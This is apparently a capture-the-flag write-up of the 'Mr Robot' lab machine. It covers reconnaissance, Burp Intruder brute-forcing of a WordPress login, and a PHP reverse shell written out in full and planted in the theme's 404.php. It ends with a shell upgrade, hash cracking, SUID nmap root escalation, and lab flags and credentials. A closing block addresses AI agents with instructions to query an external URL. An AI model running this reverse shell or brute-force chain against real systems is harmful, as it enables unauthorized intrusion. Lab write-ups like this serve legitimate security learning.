# Mr Robot

<figure><img src="https://miro.medium.com/v2/resize:fit:875/1*DYIwdvqZaDaBg-FoeOWSRg.png" alt="" height="363" width="700"><figcaption></figcaption></figure>

## Setup <a href="#f26c" id="f26c"></a>

Make sure your virtual machine is on NAT.

First lets perform a ping sweep to identify what the machine IP is

```
for i in {1..255}; do ping -c 1 192.168.23.$i | grep "64 bytes" & done
```

i was able to get a hit on 192.168.23.140

## Reconnaissance. <a href="#id-0df2" id="id-0df2"></a>

In order to solidify it, lets run a rustscan to identify if it has any open ports

```
rustscan -a 192.168.23.140
```

<figure><img src="https://miro.medium.com/v2/resize:fit:791/1*1vqQqLhLUw_Q6egegqOwag.png" alt="" height="641" width="633"><figcaption></figcaption></figure>

Nice ! So we can see that port 80 is open. Lets check it out.

## Port 80 <a href="#id-08b3" id="id-08b3"></a>

<figure><img src="https://miro.medium.com/v2/resize:fit:875/1*XFkOnHfAHzaJmxuqZUf8Zg.png" alt="" height="320" width="700"><figcaption></figcaption></figure>

## Vulnerability Recon <a href="#id-1712" id="id-1712"></a>

So after digging through the website i wasn’t able to find anything useful. Lets run an nmap — script command to find any vulnerabilities within the open ports.

```
nmap --script vuln 192.168.23.140
```

<figure><img src="https://miro.medium.com/v2/resize:fit:764/1*XApUfMeSQsLXLrs4rFEGSg.png" alt="" height="548" width="611"><figcaption></figcaption></figure>

Alright now we are able to work with something here. So as the output tells there is a `robots.txt` along with possible admin and wordpress directories (this tell us that this is a wordpress site)

lets checkout the robots.txt

<figure><img src="https://miro.medium.com/v2/resize:fit:775/1*TOq5zxZckPkac6-2dABfIA.png" alt="" height="219" width="620"><figcaption></figcaption></figure>

Nice so we able to get 1/3 keys in this machine (not too hard)

## 1/3 Key <a href="#id-1d7d" id="id-1d7d"></a>

**Key : 073403c8a58a1f80d943455fb30724b9**

## Wordlist <a href="#id-7186" id="id-7186"></a>

Alright so referring back to the `robots.txt` there is a also a `.dic` file which is supposedly a wordlist. This could hint that there could be some brute-forcing involved. so i downloaded it to my local machine using

```
wget http://192.168.23.140/fsocity.dic
```

The file seems to be quite large and i also noticed that it has alot of repetitive characters, so lets clean it up by only keeping one of each.

```
sort fsocity.dic | uniq > fsocity_filtered.dic
```

Alright so we got a wordlist.

## WordPress login <a href="#id-9831" id="id-9831"></a>

So referring back to the nmap scan results we can noticed a `wp-login.php` which is a standard WordPress login form.

<figure><img src="https://miro.medium.com/v2/resize:fit:619/1*K30jXv_suSlPpjenx3ylEw.png" alt="" height="518" width="495"><figcaption></figcaption></figure>

so tried some default credentials but nope nothing worked. But lets not waste time on that since its quite obvious that we would have to brute force this with the earlier found wordlist.

After some attempts in brtue-forcing the login page via burp intruder i wasnt getting any hint. I also scavenged for any usernames throughout the website but got nothing.

That is when grok.com suggested me to use Mr.Robot Character names for the username field, which makes sense. So i told grok to generate the list of characters in Mr.Robot and loaded it up on burp intruder.

## Brute Forcing Process. <a href="#f87e" id="f87e"></a>

We first capture a login traffic via burp’s proxy, load it up on burp intruder and set the brackets for the two parameters.

<figure><img src="https://miro.medium.com/v2/resize:fit:875/1*dG8Nwg4ZoUegNrtHkIX-Ow.png" alt="" height="264" width="700"><figcaption></figcaption></figure>

After thats done, i set the payload 1 (username) with the character list and payload 2(password) with the extracted wordlist.

<figure><img src="https://miro.medium.com/v2/resize:fit:875/1*-spAXh4s0_E2STSc0OYMzA.png" alt="" height="303" width="700"><figcaption></figcaption></figure>

So as you can see i got a small change in content length on `elliot` which could hint that this username is a valid username. This was double checked when the login form said that the `password for this username is wrong`

so this helped me shortlist it and fuzz passwords with the username set to elliot. We finally got a hit on the password

<figure><img src="https://miro.medium.com/v2/resize:fit:875/1*bsw6oph52iQXKtSs1huC9A.png" alt="" height="313" width="700"><figcaption></figcaption></figure>

The credentials are **elliot : ER28–0652**

## WordPress Recon <a href="#e5ef" id="e5ef"></a>

<figure><img src="https://miro.medium.com/v2/resize:fit:875/1*4RAB1WVkygCYC5UVhkmnWA.png" alt="" height="304" width="700"><figcaption></figcaption></figure>

Sweet we got into the wp-admin dashboard now lets dig from here

So after some digging around i was unable to find any direct exploits towards the available plugins. so i thought of checking out hte `Users` section as it could hold some potentials information.

<figure><img src="https://miro.medium.com/v2/resize:fit:875/1*PHy0KGQ_uxSHmYPLc-gn6g.png" alt="" height="191" width="700"><figcaption></figcaption></figure>

Alright we got a new use called `mich05654` which is also another character in Mr. Robot. Lets check her out

<figure><img src="https://miro.medium.com/v2/resize:fit:875/1*_K4wmICHgmHK7xTmMFIrBQ.png" alt="" height="492" width="700"><figcaption></figcaption></figure>

Okay so we got a small hint saying `another key?` in her bio, this could mean she is holding onto the second key. so lets login to her account by generating a new password.

## Reverse shell | Web page editor <a href="#id-45bc" id="id-45bc"></a>

Well after logging in as `mich05654` i didnt find anything useful as she was a normal user, only elliot was admin.

I logged back into elliot and noticed a file editor option. this was under the appearance tab.

<figure><img src="https://miro.medium.com/v2/resize:fit:875/1*vQtSCYHYLNyrg6wbeQCPXw.png" alt="" height="301" width="700"><figcaption></figcaption></figure>

Nice so technically i could inject a reverse shell code into any of the .php files and if called it would give me a shell into the server.

For this i chose the `404.php` file and edited it as such

## Shell Code <a href="#id-3f3e" id="id-3f3e"></a>

```
<?php
/**
 * The template for displaying 404 pages (not found)
 *
 * @package WordPress
 * @subpackage Twenty_Fifteen
 * @since Twenty Fifteen 1.0
 */
```

```
get_header(); ?>    <div id="primary" class="content-area">
        <main id="main" class="site-main" role="main">            <section class="error-404 not-found">
                <header class="page-header">
                    <h1 class="page-title"><?php _e( 'Oops! That page can’t be found.', 'twentyfifteen' ); ?></h1>
                </header><!-- .page-header -->                <div class="page-content">
                    <p><?php _e( 'It looks like nothing was found at this location. Maybe try a search?', 'twentyfifteen' ); ?></p>                    <?php get_search_form(); ?>
                </div><!-- .page-content -->
            </section><!-- .error-404 -->        </main><!-- .site-main -->
    </div><!-- .content-area --><?php
// Reverse shell code
$ip = "192.168.23.138";  // Your local IP
$port = 4444;            // Your chosen port// Attempt to create a reverse shell
$sock = @fsockopen($ip, $port, $errno, $errstr, 5);  // 5-second timeout
if ($sock) {
    $descriptorspec = array(
        0 => array("pipe", "r"),  // stdin
        1 => array("pipe", "w"),  // stdout
        2 => array("pipe", "w")   // stderr
    );
    $process = proc_open('/bin/sh -i', $descriptorspec, $pipes, null, null);
    if (is_resource($process)) {
        stream_set_blocking($sock, 0);
        foreach ($pipes as $pipe) {
            stream_set_blocking($pipe, 0);
        }
        fwrite($pipes[0], "whoami\n");  // Test command
        while (!feof($sock)) {
            fwrite($pipes[0], fread($sock, 1024));
            fwrite($sock, fread($pipes[1], 1024));
            fwrite($sock, fread($pipes[2], 1024));
        }
        foreach ($pipes as $pipe) {
            fclose($pipe);
        }
        proc_close($process);
    }
    fclose($sock);
}
?><?php get_footer(); ?>
```

Saved my changes, opened a netcat listener (`nc -nvlp 4444`) and visited a non-existent web page.

Solid ! so now i was doing some digging into the directories and found out about user `robot` and that user contains the following files.

you can establish a better and more interactive shell by running this command `python -c 'import pty; pty.spawn("/bin/bash")'`

<figure><img src="https://miro.medium.com/v2/resize:fit:875/1*Hm_DdtL40uvZ8nvQMtwXUQ.png" alt="" height="546" width="700"><figcaption></figcaption></figure>

So we cannot read the key directly but we can read the hashed password of robot.

<figure><img src="https://miro.medium.com/v2/resize:fit:644/1*OJ5WC-ieAucWrp2UjaVcPw.png" alt="" height="143" width="515"><figcaption></figcaption></figure>

```
robot : c3fcd3d76192e4007dfb496cca67e13b
```

I was able to crack the password using crackstation

<https://crackstation.net/>

**robot : abcdefghijklmnopqrstuvwxyz**

Now lets login to robot and capture the flag. :) (login via the VM)

<figure><img src="https://miro.medium.com/v2/resize:fit:803/1*jC_eDH1kawQEmtuj06DcRA.png" alt="" height="421" width="642"><figcaption></figcaption></figure>

## 2/3 Key <a href="#id-65d0" id="id-65d0"></a>

**Key : 822c73956184f694993bede3eb39f959**

## Privilege Escalation <a href="#id-2143" id="id-2143"></a>

Alright now lets get our hands dirty with privesc. So lets first run a weak binary check, this will help us to identify if any binaries have root access but can also be executable by any user.

```
find / -perm -u=s -type f 2>/dev/null
```

## Nmap <a href="#id-50df" id="id-50df"></a>

<figure><img src="https://miro.medium.com/v2/resize:fit:593/1*Ce8xKtlBkLx9j-xQPsev_g.png" alt="" height="224" width="474"><figcaption></figcaption></figure>

Interesting! we got nmap as a weak binary so lets check the version of it. The version is 3.81. I believe we can exploit this binary using GTFO bins.

<https://gtfobins.github.io/gtfobins/nmap/>

Lets attempt to establish an interactive shell using the following commands

```
nmap --interactive
nmap > !sh
```

<figure><img src="https://miro.medium.com/v2/resize:fit:685/1*lVKtlCbu1F_uBTKR442nXQ.png" alt="" height="158" width="548"><figcaption></figcaption></figure>

Voila we rooted the machine, now lets capture the last key.

## 3/3 Key <a href="#id-4571" id="id-4571"></a>

**Key : 04787ddef27c3dee1ee161b21670b4e4**


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://foothold.gitbook.io/blog/mr-robot.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.